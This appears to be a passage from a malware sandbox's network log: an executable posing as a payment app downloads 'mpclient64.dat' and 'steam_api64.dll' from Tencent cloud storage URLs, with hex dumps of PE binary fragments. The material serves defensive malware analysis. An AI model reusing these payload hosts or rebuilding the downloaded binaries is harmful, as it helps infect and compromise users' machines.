69 63 68 4e 41 89 a5 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ NANANA<A<BA<FA^GA^@A^kA<KANA(AOAOAvOAOARichNA
2025-01-16 12:44:16 UTC	16368	IN	Data Raw: 48 8d 0d 55 19 04 00 48 89 08 48 8b 44 24 30 48 83 c0 08 48 8b f8 33 c0 b9 10 00 00 00 f3 aa 48 8b 44 24 30 48 83 c0 08 48 8b 4c 24 38 48 83 c1 08 48 8b d0 e8 03 14 00 00 90 48 8b 44 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 57 48 8b 44 24 10 48 8d 0d f4 18 04 00 48 89 08 48 8b 44 24 10 48 83 c0 08 48 8b f8 33 c0 b9 10 00 00 00 f3 aa 48 8b 44 24 10 48 8b 4c 24 18 48 89 48 08 48 8b 44 24 10 5f c3 cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 2d 00 00 00 90 48 83 c4 28 c3 cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 cd ff ff ff 90 48 83 c4 28 c3 cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d 6b 18 04 00 48 89 08 48 8b 44 24 30 48 83 c0 08 48 8b Data Ascii: HUHHD$0HH3HD$0HHL$8HHHD$0H _DD$HT$HL$WHD$HHHD$HH3HD$HL$HHHD$_HL$H(HL$0-H(HL$H(HL$0H(HL$H(HD$0HkHHD$0HH
2025-01-16 12:44:16 UTC	8184	IN	Data Raw: 00 48 8b 4c 24 78 48 39 41 10 74 7e 48 8b 84 24 10 01 00 00 81 38 4d 4f 43 e0 74 6e 48 8b 84 24 10 01 00 00 81 38 52 43 43 e0 74 5e 8b 84 24 38 01 00 00 89 44 24 38 48 8b 84 24 48 01 00 00 48 89 44 24 30 8b 84 24 40 01 00 00 89 44 24 28 48 8b 84 24 30 01 00 00 48 89 44 24 20 4c 8b 8c 24 28 01 00 00 4c 8b 84 24 20 01 00 00 48 8b 94 24 18 01 00 00 48 8b 8c 24 10 01 00 00 e8 5b dd ff ff 85 c0 74 05 e9 58 02 00 00 48 8b 84 24 28 01 00 00 4c 8b 40 08 48 8b 94 24 30 01 00 00 48 8d 8c 24 80 00 00 00 e8 91 09 00 00 48 8d 8c 24 80 00 00 00 e8 a4 16 00 00 85 c0 76 02 eb 06 e8 b9 88 01 00 90 48 8d 8c 24 80 00 00 00 e8 8b 16 00 00 85 c0 0f 86 09 02 00 00 8b 84 24 40 01 00 00 89 44 24 28 48 8b 84 24 30 01 00 00 48 89 44 24 20 4c 8b 8c 24 28 01 00 00 44 8b 84 24 38 01 Data Ascii: HL$xH9At~H$8MOCtnH$8RCCt^$8D$8H$HHD$0$@D$(H$0HD$ L$(L$ H$H$[tXH$(L@H$0H$H$vH$$@D$(H$0HD$ L$(D$8
2025-01-16 12:44:16 UTC	8184	IN	Data Raw: 00 00 4c 8d 05 cb d3 03 00 48 8d 15 24 d4 03 00 48 8d 0d 95 d3 03 00 e8 c8 7f 01 00 b8 ff ff ff ff e9 29 01 00 00 48 83 bc 24 b0 00 00 00 00 74 0a c7 44 24 38 01 00 00 00 eb 08 c7 44 24 38 00 00 00 00 8b 44 24 38 89 44 24 3c 83 7c 24 3c 00 75 3a 48 8d 05 fb d3 03 00 48 89 44 24 28 48 8d 05 a7 b9 03 00 48 89 44 24 20 45 33 c9 41 b8 23 00 00 00 48 8d 15 5a d3 03 00 b9 02 00 00 00 e8 30 79 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 3c 00 75 5e 48 8b 8c 24 b8 00 00 00 e8 94 79 00 00 48 89 44 24 48 ba 16 00 00 00 48 8b 4c 24 48 e8 e0 88 00 00 48 8b 84 24 b8 00 00 00 48 89 44 24 28 48 c7 44 24 20 00 00 00 00 41 b9 23 00 00 00 4c 8d 05 fd d2 03 00 48 8d 15 56 d3 03 00 48 8d 0d 6f d3 03 00 e8 fa 7e 01 00 b8 ff ff ff ff eb 5e 48 8d 84 24 c0 00 00 00 48 89 44 24 28 48 Data Ascii: LH$H)H$tD$8D$8D$8D$<\|$<u:HHD$(HHD$ E3A#HZ0yu3\|$<u^H$yHD$HHL$HH$HD$(HD$ A#LHVHo~^H$HD$(H
2025-01-16 12:44:16 UTC	16384	IN	Data Raw: 85 c0 75 16 c6 44 24 20 00 48 8d 4c 24 30 e8 29 8e ff ff 0f b6 44 24 20 eb 3d 48 8b 44 24 60 48 05 08 04 00 00 48 8d 54 24 30 48 8b c8 e8 1a 51 00 00 48 8b 44 24 60 48 8b 4c 24 28 48 89 88 00 04 00 00 c6 44 24 21 01 48 8d 4c 24 30 e8 ea 8d ff ff 0f b6 44 24 21 48 83 c4 58 c3 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 83 c0 18 48 8b c8 e8 71 0d 00 00 48 0f be c0 48 8b 4c 24 38 48 89 01 b0 01 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 83 c0 18 48 8b c8 e8 31 0d 00 00 0f b6 c0 48 8b 4c 24 38 48 89 01 b0 01 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 83 c0 18 48 8b c8 e8 61 0d 00 00 48 0f bf c0 Data Ascii: uD$ HL$0)D$ =HD$`HHT$0HQHD$`HL$(HD$!HL$0D$!HXHT$HL$H(HD$0HHqHHL$8HH(HT$HL$H(HD$0HH1HL$8HH(HT$HL$H(HD$0HHaH
2025-01-16 12:44:16 UTC	8168	IN	Data Raw: 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 8b 44 24 50 48 83 c0 50 48 8b c8 e8 6c bd ff ff 48 89 44 24 38 48 8b 4c 24 50 48 83 c1 50 e8 b9 bc ff ff 48 8b 4c 24 38 48 8d 44 01 ff 48 89 44 24 30 48 8b 4c 24 50 e8 a0 52 00 00 48 89 44 24 28 48 8b 44 24 28 48 8b 4c 24 30 48 89 08 48 8b 44 24 50 83 78 30 00 7f 0c 48 83 7c 24 58 00 0f 84 86 00 00 00 48 8b 44 24 50 8b 40 30 ff c8 48 8b 4c 24 50 89 41 30 33 d2 48 8b 44 24 58 b9 08 00 00 00 48 f7 f1 48 8b c2 48 83 c0 30 88 44 24 20 33 d2 48 8b 44 24 58 b9 08 00 00 00 48 f7 f1 48 89 44 24 58 0f be 44 24 20 83 f8 39 7e 15 0f be 44 24 20 0f b6 54 24 60 8b c8 e8 5c 12 00 00 88 44 24 20 48 8b 44 24 28 48 8b 00 0f b6 4c 24 20 88 08 48 8b 44 24 28 48 8b 00 48 ff c8 48 8b 4c 24 28 48 89 01 e9 63 ff ff ff 48 8b 44 24 Data Ascii: HT$HL$HHHD$PHPHlHD$8HL$PHPHL$8HDHD$0HL$PRHD$(HD$(HL$0HHD$Px0H\|$XHD$P@0HL$PA03HD$XHHH0D$ 3HD$XHHD$XD$ 9~D$ T$`\D$ HD$(HL$ HD$(HHHL$(HcHD$
2025-01-16 12:44:16 UTC	16368	IN	Data Raw: 8b 4c 24 70 e8 fb 09 00 00 0f b6 c0 85 c0 75 0a b8 ff ff ff ff e9 c7 01 00 00 48 8b 44 24 70 80 78 24 08 0f 82 cb 00 00 00 33 c0 85 c0 74 0a c7 44 24 3c 01 00 00 00 eb 08 c7 44 24 3c 00 00 00 00 8b 44 24 3c 89 44 24 40 83 7c 24 40 00 75 3a 48 8d 05 3d 56 03 00 48 89 44 24 28 48 8d 05 c9 39 03 00 48 89 44 24 20 45 33 c9 41 b8 9a 06 00 00 48 8d 15 ac 55 03 00 b9 02 00 00 00 e8 52 f9 00 00 83 f8 01 75 03 cc 33 c0 83 7c 24 40 00 75 63 48 8b 44 24 70 48 8b 48 08 e8 b5 f9 ff ff 48 89 44 24 58 ba 16 00 00 00 48 8b 4c 24 58 e8 01 09 00 00 48 8b 44 24 70 48 8b 40 08 48 89 44 24 28 48 c7 44 24 20 00 00 00 00 41 b9 9a 06 00 00 4c 8d 05 4d 55 03 00 48 8d 15 06 56 03 00 48 8d 0d af 55 03 00 e8 1a ff 00 00 b8 ff ff ff ff e9 ed 00 00 00 c6 44 24 30 00 48 8b 44 24 70 0f Data Ascii: L$puHD$px$3tD$<D$<D$<D$@\|$@u:H=VHD$(H9HD$ E3AHURu3\|$@ucHD$pHHHD$XHL$XHD$pH@HD$(HD$ ALMUHVHUD$0HD$p
2025-01-16 12:44:16 UTC	16368	IN	Data Raw: 0f b6 c0 85 c0 0f 84 c1 00 00 00 33 c0 66 89 44 24 30 48 8d 54 24 30 48 8b 4c 24 70 e8 63 62 ff ff 0f b6 c0 85 c0 75 07 32 c0 e9 0f 01 00 00 48 8b 4c 24 70 e8 db c9 ff ff 0f b6 c0 85 c0 75 07 b0 01 e9 f7 00 00 00 48 8b 44 24 70 48 8b 40 08 48 89 44 24 40 0f b7 44 24 30 66 89 44 24 34 48 8b 44 24 70 48 83 c0 50 48 8b c8 e8 a4 5c ff ff 48 89 44 24 48 48 8b 44 24 70 48 83 c0 50 48 8b c8 e8 2e 5d ff ff 48 89 44 24 50 48 8b 44 24 70 48 83 c0 48 48 8b 4c 24 40 48 89 4c 24 20 44 0f b7 4c 24 34 4c 8b 44 24 48 48 8b 54 24 50 48 8b c8 e8 2e 1b 01 00 89 44 24 38 83 7c 24 38 00 74 09 48 8b 44 24 70 c6 40 38 01 eb 56 48 8b 44 24 70 48 83 c0 50 48 8b c8 e8 d7 5c ff ff b9 01 00 00 00 48 6b c9 00 48 03 c1 48 8b d0 48 8b 4c 24 70 e8 4e 60 ff ff 0f b6 c0 85 c0 75 04 32 c0 Data Ascii: 3fD$0HT$0HL$pcbu2HL$puHD$pH@HD$@D$0fD$4HD$pHPH\HD$HHD$pHPH.]HD$PHD$pHHHL$@HL$ DL$4LD$HHT$PH.D$8\|$8tHD$p@8VHD$pHPH\HkHHHL$pN`u2
2025-01-16 12:44:16 UTC	8184	IN	Data Raw: 08 48 2b c1 48 63 4c 24 30 48 8b 54 24 70 48 89 44 ca 08 48 63 44 24 30 48 8b 4c 24 70 48 83 7c c1 30 00 75 17 48 63 44 24 30 48 8b 4c 24 70 48 83 7c c1 08 00 75 05 e9 5c ff ff ff 83 7c 24 30 00 75 05 e9 50 ff ff ff 83 7c 24 30 02 75 12 8b 05 5b 17 04 00 83 e0 10 85 c0 75 05 e9 37 ff ff ff c6 44 24 34 01 e9 2d ff ff ff 48 8b 84 24 80 00 00 00 48 8b 4c 24 78 48 8b 49 58 48 8b 40 58 48 2b c1 48 8b 4c 24 70 48 89 41 58 48 8b 84 24 80 00 00 00 48 8b 4c 24 78 48 8b 49 60 48 8b 40 60 48 2b c1 48 8b 4c 24 70 48 89 41 60 48 8b 44 24 70 48 c7 00 00 00 00 00 0f b6 44 24 34 85 c0 74 0a c7 44 24 50 01 00 00 00 eb 08 c7 44 24 50 00 00 00 00 8b 44 24 50 48 83 c4 68 c3 cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 33 c9 e8 d0 06 01 00 90 48 8b 4c 24 40 e8 55 36 00 00 Data Ascii: H+HcL$0HT$pHDHcD$0HL$pH\|0uHcD$0HL$pH\|u\\|$0uP\|$0u[u7D$4-H$HL$xHIXH@XH+HL$pHAXH$HL$xHI`H@`H+HL$pHA`HD$pHD$4tD$PD$PD$PHhHL$H83HL$@U6
2025-01-16 12:44:16 UTC	16384	IN	Data Raw: b7 f7 03 00 ff 74 0d 8b 05 af f7 03 00 39 44 24 60 75 01 cc 48 83 3d a0 f9 03 00 00 0f 84 ee 00 00 00 48 8b 05 93 f9 03 00 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 48 89 84 24 88 00 00 00 8b 84 24 d0 00 00 00 89 44 24 30 48 8b 84 24 c8 00 00 00 48 89 44 24 28 8b 44 24 60 89 44 24 20 44 8b 8c 24 c0 00 00 00 48 8b 84 24 b8 00 00 00 4c 8b 00 48 8b 94 24 b0 00 00 00 b9 02 00 00 00 48 8b 84 24 88 00 00 00 e8 ae 77 02 00 85 c0 75 7e 48 83 bc 24 c8 00 00 00 00 74 3d 8b 84 24 d0 00 00 00 89 44 24 30 48 8b 84 24 c8 00 00 00 48 89 44 24 28 48 8d 05 20 e0 02 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 ac 58 00 00 83 f8 01 75 03 cc 33 c0 eb 2f 48 8d 05 33 e0 02 00 48 89 44 24 28 48 8d 05 37 a8 02 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 7b 58 Data Ascii: t9D$`uH=HH$H$H$$D$0H$HD$(D$`D$ D$H$LH$H$wu~H$t=$D$0H$HD$(H HD$ E3E333Xu3/H3HD$(H7HD$ E3E333{X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49709	183.66.100.51	443	5892	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:44:18 UTC	96	OUT	GET /mpclient64.dat HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
2025-01-16 12:44:18 UTC	475	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Length: 38357 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:44:18 GMT ETag: "064a2c07c19eb983c114b318216e2492" Last-Modified: Fri, 10 Jan 2025 23:32:07 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 6072581755993204641 x-cos-request-id: Njc4OGZmMjJfNWM3NjA1MGJfMjIzYjFfMTQ4ZTNjMGM= x-cos-server-side-encryption: AES256
2025-01-16 12:44:18 UTC	7729	IN	Data Raw: e8 c0 33 00 00 c0 33 00 00 96 9e 3b 5e 55 e3 8a b1 c3 8c 67 83 4f bb 1b 6d 46 62 84 01 aa 31 7c 73 14 d7 f9 22 34 6d a5 0f 00 00 00 00 01 f7 a8 88 38 da d3 a8 58 16 2e d6 ac 64 74 2e 23 8e bf 4d 29 3d 80 a2 dc 51 9e 54 aa 70 94 74 27 2b 3c c7 d4 bb e7 01 22 30 32 38 c2 dc 77 d9 dd 34 b6 43 34 c6 76 41 35 f7 24 51 46 20 cb 35 17 9d b1 00 ee 12 5d 1a b4 22 d1 db 9a 0d 5f b0 17 f9 bd b6 f9 d4 6d b8 e6 00 6b 01 1d 05 7e 99 86 24 1d ee 03 34 2d a0 da a1 4b 92 05 b4 97 a1 31 23 aa c7 44 30 0b 53 8f cb 14 11 71 6c ba 16 10 8d 2a a6 bb 69 c0 ab ba 32 f0 37 aa 1a dc 25 ad a9 3c 63 12 50 fc 40 34 7d cd 41 07 7e 48 62 6d 2d 94 83 ce 46 13 9f 96 b8 8f f5 f7 2a 9b 62 00 4a 59 cc c0 32 8b 36 b3 8f ea b7 f1 38 fe 1a 07 a3 6c fe 04 3c df 7a 2a 01 00 9b 2d a0 6c 1f 04 7a Data Ascii: 33;^UgOmFb1\|s"4m8X.dt.#M)=QTpt'+<"028w4C4vA5$QF 5]"_mk~$4-K1#D0Sqli27%<cP@4}A~Hbm-FbJY268l<z*-lz
2025-01-16 12:44:18 UTC	16384	IN	Data Raw: 77 a7 86 87 38 dd 0a c0 df 10 8c c7 ba 14 b3 5f b2 b3 96 fe a7 fb 24 25 bf 64 f6 ab 02 f7 5e 60 ec 74 93 9a 93 69 6b 64 46 ec a0 60 9e bf 99 40 e8 6e a5 22 b9 08 d1 ab c6 ae 42 c0 8e c1 8e cc fb 14 aa 35 13 f7 b1 7a 7e d4 94 6d ad 6a df d0 7b 58 e2 95 33 51 24 9f a9 6b da 91 c8 2e c2 6d 2d 36 f6 f9 ee a8 5b 66 04 ab 45 16 fa 5a 21 53 6a c7 3d a9 1b 0f ed be 52 90 55 11 85 fb 80 66 3e 54 12 7c 07 f5 3f eb 31 9f 24 1b b9 b6 85 8e 28 5c c0 12 64 a2 0e 11 bd d8 4f db 98 81 b6 46 19 26 6c 53 88 3e 23 c5 75 ab 8f 23 73 aa cc 4a 8e d8 d4 39 a9 89 e1 1f 9c 66 b4 b7 d4 cb f9 bf 83 de 48 3a b7 c6 0a 91 2d 7e 54 85 5c da 8c a9 42 a2 13 38 02 f1 03 55 ed b3 2e eb 3b e8 13 e3 9c 97 cb 93 d2 7d 70 9b c0 08 8b 9c 67 05 de 4d fb 24 07 2a 42 94 5c 23 46 e0 56 13 bd 3e ea Data Ascii: w8_$%d^`tikdF`@n"B5z~mj{X3Q$k.m-6[fEZ!Sj=RUf>T\|?1$(\dOF&lS>#u#sJ9fH:-~T\B8U.;}pgM$*B\#FV>
2025-01-16 12:44:18 UTC	8168	IN	Data Raw: 85 db 74 41 48 8d 4f 08 48 39 01 74 0d 41 03 e9 48 83 c1 08 3b eb 72 f0 eb 2b 45 8a c1 48 8d 4c 24 20 49 8b d6 ff 96 d0 01 00 00 48 8d 0c ef 41 b8 10 00 00 00 48 8d 54 24 20 e8 54 09 00 00 41 b9 01 00 00 00 49 8b 47 18 48 8b 78 10 e9 02 01 00 00 4c 8d a6 70 03 00 00 41 8a 0c 24 33 ed 33 d2 45 8b f9 84 c9 0f 84 e5 00 00 00 45 33 c0 80 f9 3b 74 2e 81 fa 80 00 00 00 73 26 33 c0 42 88 4c 04 30 80 f9 77 41 0f 45 c7 80 f9 70 44 8b f8 41 0f 44 e9 41 03 d1 44 8b c2 42 8a 0c 22 84 c9 75 cd 85 d2 0f 84 a7 00 00 00 8d 4a 01 c6 44 14 30 00 48 8b 57 30 4c 8d 44 24 30 4c 03 e1 45 33 c9 48 8b ce e8 a2 01 00 00 48 8b d8 41 b9 01 00 00 00 48 85 c0 74 82 45 85 ff 74 38 85 ed 74 14 ff d3 48 8b d8 41 b9 01 00 00 00 48 85 c0 0f 84 65 ff ff ff 48 8b 13 48 8b ce e8 a4 e5 ff ff Data Ascii: tAHOH9tAH;r+EHL$ IHAHT$ TAIGHxLpA$33EE3;t.s&3BL0wAEpDADADB"uJD0HW0LD$0LE3HHAHtEt8tHAHeHH
2025-01-16 12:44:18 UTC	6076	IN	Data Raw: 83 3e 01 74 17 39 2e 74 13 83 3e 05 74 05 83 3e 06 75 41 56 57 e8 8f 0c 00 00 eb 36 8d 44 24 24 50 56 57 e8 d4 fa ff ff 83 c4 0c 85 c0 74 0f 8d 44 24 24 50 56 57 e8 a0 00 00 00 83 c4 0c 8d 44 24 24 50 57 e8 7f f5 ff ff eb 07 56 57 e8 e9 03 00 00 59 59 83 bf 30 02 00 00 03 75 02 eb fe 8b 6c 24 10 8b 87 20 09 00 00 83 f8 02 74 05 83 f8 03 75 37 8b 87 60 0d 00 00 85 c0 74 2d ff b7 58 0d 00 00 6a 00 50 e8 c0 16 00 00 8b 5c 24 20 83 c4 0c 68 00 c0 00 00 6a 00 ff b7 60 0d 00 00 ff d3 83 a7 60 0d 00 00 00 eb 04 8b 5c 24 14 ff 37 8b b7 30 02 00 00 6a 00 57 e8 8d 16 00 00 83 c4 0c 68 00 c0 00 00 6a 00 57 ff d3 83 fe 02 75 04 6a 00 ff d5 33 c0 e9 c1 fc ff ff 81 ec 7c 02 00 00 53 8b 9c 24 84 02 00 00 33 c0 55 56 8b b4 24 90 02 00 00 33 ed 21 6c 24 18 57 8d 7c 24 48 Data Ascii: >t9.t>t>uAVW6D$$PVWtD$$PVWD$$PWVWYY0ul$ tu7`t-XjP\$ hj``\$70jWhjWuj3\|S$3UV$3!l$W\|$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49727	183.66.100.45	443	5892	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:44:20 UTC	117	OUT	GET /steam_api64.dll HTTP/1.1 Host: wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com Connection: Keep-Alive
2025-01-16 12:44:21 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 301928 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:44:21 GMT ETag: "543515a345cc88cb93413953f06f34a4" Last-Modified: Tue, 07 Jan 2025 13:41:58 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 3051293360534322159 x-cos-request-id: Njc4OGZmMjVfYTQxMTNmMGJfMmI0MF9mNDBmYWM2 x-cos-server-side-encryption: AES256
2025-01-16 12:44:21 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 56 4c 56 00 01 00 00 00 00 6e 04 00 fd 7c ff 64 69 96 9c 7b a3 67 ff a6 70 ac 86 b1 3f 7c 77 ac e3 ee f1 c1 28 55 f4 9a e0 b2 12 9a 52 b2 1d e8 67 5c 07 82 9d 34 9f 42 63 f5 08 e8 ce 43 c9 8c 77 1c dc 73 7e 14 9e c7 58 75 66 16 0b 6e 18 e7 69 e7 8b 2f c6 2d 40 f4 24 7f 8c 8e 42 60 02 39 da 4e 92 00 d6 47 b0 6c b6 14 8e 95 f4 fe 59 f5 08 02 46 f5 d5 f2 0d 80 ac 03 89 66 1c ca e9 42 d0 da 8c 72 56 f4 0d 8a d8 43 19 ec 05 9a b8 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@VLVn\|di{gp?\|w(URg\4BcCws~Xufni/-@$B`9NGlYFfBrVC)
2025-01-16 12:44:21 UTC	8184	IN	Data Raw: ff 62 20 cc cc cc cc cc cc cc cc cc c6 81 00 01 00 00 00 c6 01 00 c3 cc cc cc cc cc 48 83 ec 28 48 8d 0d b5 17 04 00 e8 30 61 00 00 48 8b 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 48 83 ec 28 48 8d 0d 75 16 04 00 e8 10 61 00 00 48 8b 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 48 83 ec 28 48 8d 0d 2d 17 04 00 e8 f0 60 00 00 48 8b 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 0f 57 c0 33 c0 0f 11 01 0f 11 41 10 0f 11 41 20 0f 11 41 30 0f 11 41 40 0f 11 41 50 0f 11 41 60 0f 11 41 70 89 81 80 00 00 00 c3 cc cc cc cc cc 0f b6 41 04 c1 e0 10 85 c0 74 23 0f b6 51 05 84 d2 74 1b 44 0f b6 41 06 c1 e2 08 0b c2 45 84 c0 74 0c 0f b6 51 07 c1 e2 18 41 0b d0 0b c2 c3 cc 4c 8b d9 44 88 49 06 c6 41 08 00 44 8b d2 41 8b c1 c1 e8 10 88 41 04 41 8b c1 c1 e8 08 88 41 05 41 c1 e9 Data Ascii: b H(H0aHH(H(HuaHH(H(H-`HH(W3AA A0A@APA`ApAt#QtDAEtQALDIADAAAAA
2025-01-16 12:44:21 UTC	8184	IN	Data Raw: 18 e9 92 00 00 00 48 8b 47 10 48 8b cf 80 78 19 00 75 0e 90 48 8b c8 48 8b 40 10 80 78 19 00 74 f3 48 89 4a 10 41 0f b6 51 18 eb 6c 48 89 41 08 49 8b 0e 48 89 08 49 3b 00 75 05 48 8b d8 eb 1f 80 7f 19 00 48 8b 58 08 75 04 48 89 5f 08 48 89 3b 49 8b 08 48 89 48 10 49 8b 08 48 89 41 08 48 8b 0e 4c 39 71 08 75 06 48 89 41 08 eb 12 49 8b 4e 08 4c 39 31 75 05 48 89 01 eb 04 48 89 41 10 49 8b 4e 08 0f b6 50 18 48 89 48 08 41 0f b6 4e 18 88 48 18 41 88 56 18 80 fa 01 0f 85 bd 01 00 00 48 8b 06 48 3b 78 08 0f 84 ac 01 00 00 66 0f 1f 44 00 00 80 7f 18 01 4c 8b c3 0f 85 99 01 00 00 48 8b 0b 48 3b f9 0f 85 c3 00 00 00 48 8b 4b 10 80 79 18 00 75 54 c6 41 18 01 48 8b 4b 10 c6 43 18 00 48 8b 01 48 89 43 10 48 8b 01 80 78 19 00 75 04 48 89 58 08 48 8b 43 08 48 89 41 08 Data Ascii: HGHxuHH@xtHJAQlHAIHI;uHHXuH_H;IHHIHAHL9quHAINL91uHHAINPHHANHAVHH;xfDLHH;HKyuTAHKCHHCHxuHXHCHA
2025-01-16 12:44:21 UTC	8184	IN	Data Raw: 0f b6 08 84 c9 0f 84 c0 00 00 00 48 3b 43 10 0f 82 b6 00 00 00 48 3b 43 18 0f 83 ac 00 00 00 80 f9 2f 75 29 38 48 01 75 24 0f 1f 00 48 8b d0 80 f9 0a 74 11 48 ff c0 48 89 43 08 48 8b d0 0f b6 08 84 c9 75 e7 0f b6 02 e9 77 ff ff ff 0f b6 43 20 84 c0 75 76 4c 8b 43 08 4d 85 c0 74 6d 41 0f b6 08 84 c9 74 65 4c 3b 43 10 72 5f 4c 3b 43 18 73 59 8d 41 85 a8 fd 74 6d 80 f9 22 75 44 49 ff c0 33 d2 4c 89 43 08 41 0f b6 08 84 c9 74 33 49 8b c0 80 f9 5c 75 0f 48 ff c0 48 89 43 08 48 ff c2 0f b6 08 eb 05 80 f9 22 74 27 48 2b c2 88 08 48 8b 43 08 48 ff c0 48 89 43 08 0f b6 08 84 c9 75 d0 48 8b 03 48 8b cb ff 50 20 32 c0 e9 5e fe ff ff 48 2b c2 40 88 30 40 b6 01 48 ff 43 08 4d 85 c0 74 e7 eb 0f 49 8d 40 01 48 89 43 08 40 88 30 48 ff 43 08 41 80 38 7b 75 3d 40 84 f6 75 Data Ascii: H;CH;C/u)8Hu$HtHHCHuwC uvLCMtmAteL;Cr_L;CsYAtm"uDI3LCAt3I\uHHCH"t'H+HCHHCuHHP 2^H+@0@HCMtI@HC@0HCA8{u=@u
2025-01-16 12:44:21 UTC	16384	IN	Data Raw: 00 00 00 48 8d 05 9a 0a 02 00 48 89 84 24 90 00 00 00 48 8d 05 8f 0a 02 00 48 89 84 24 98 00 00 00 48 8d 05 84 0a 02 00 48 89 84 24 a0 00 00 00 48 8d 05 79 0a 02 00 48 89 84 24 a8 00 00 00 c6 05 df cd 03 00 00 48 8b 17 41 b8 03 00 00 00 48 8b cd e8 01 91 00 00 85 c0 74 0f ff c6 48 ff c3 48 83 c7 08 48 83 fb 0c 7e dc 48 8d 4d 04 e8 29 9f 00 00 48 8d 4d 07 8b f8 e8 1e 9f 00 00 8b d8 4c 8d 8c 24 d8 00 00 00 33 c0 4c 8d 44 24 40 89 44 24 40 48 8d 15 1a 0a 02 00 89 84 24 d8 00 00 00 49 8b ce 89 84 24 e8 00 00 00 48 8d 84 24 e8 00 00 00 48 89 44 24 20 e8 67 03 00 00 8b 8c 24 e8 00 00 00 48 8d 15 f9 09 02 00 8b 44 24 40 44 8b ce 89 4c 24 38 44 8b c3 8b 8c 24 d8 00 00 00 89 4c 24 30 48 8d 0d 41 cd 03 00 89 44 24 28 89 7c 24 20 e8 ec c9 ff ff 4c 8d 9c 24 b0 00 00 Data Ascii: HH$HH$HH$HyH$HAHtHHH~HM)HML$3LD$@D$@H$I$H$HD$ g$HD$@DL$8D$L$0HAD$(\|$ L$
2025-01-16 12:44:21 UTC	16384	IN	Data Raw: 02 00 42 8a 8c 09 f0 96 02 00 48 2b d0 8b 42 fc d3 e8 49 89 50 08 41 89 40 18 0f b6 0a 83 e1 0f 4a 0f be 84 09 e0 96 02 00 42 8a 8c 09 f0 96 02 00 48 2b d0 8b 42 fc d3 e8 49 89 50 08 41 89 40 1c 0f b6 0a 83 e1 0f 4a 0f be 84 09 e0 96 02 00 42 8a 8c 09 f0 96 02 00 48 2b d0 8b 42 fc d3 e8 41 89 40 20 48 8d 42 04 49 89 50 08 8b 0a 41 89 48 24 8b 4c 24 60 ff c1 49 89 40 08 89 4c 24 60 3b 4d a8 0f 82 68 fe ff ff 48 8b 4d 28 48 33 cc e8 ef a0 01 00 48 81 c4 38 01 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 e8 82 cc 00 00 cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 33 db 4d 8b f0 48 8b ea 48 8b f9 39 59 04 0f 84 f0 00 00 00 48 63 71 04 e8 06 ea ff ff 4c 8b c8 4c 03 ce 0f 84 db 00 00 00 85 f6 74 0f 48 63 77 04 e8 ed e9 ff ff Data Ascii: BH+BIPA@JBH+BIPA@JBH+BA@ HBIPAH$L$`I@L$`;MhHM(H3H8A_A^A]A\_^[]HHXHhHpHx AVH 3MHH9YHcqLLtHcw
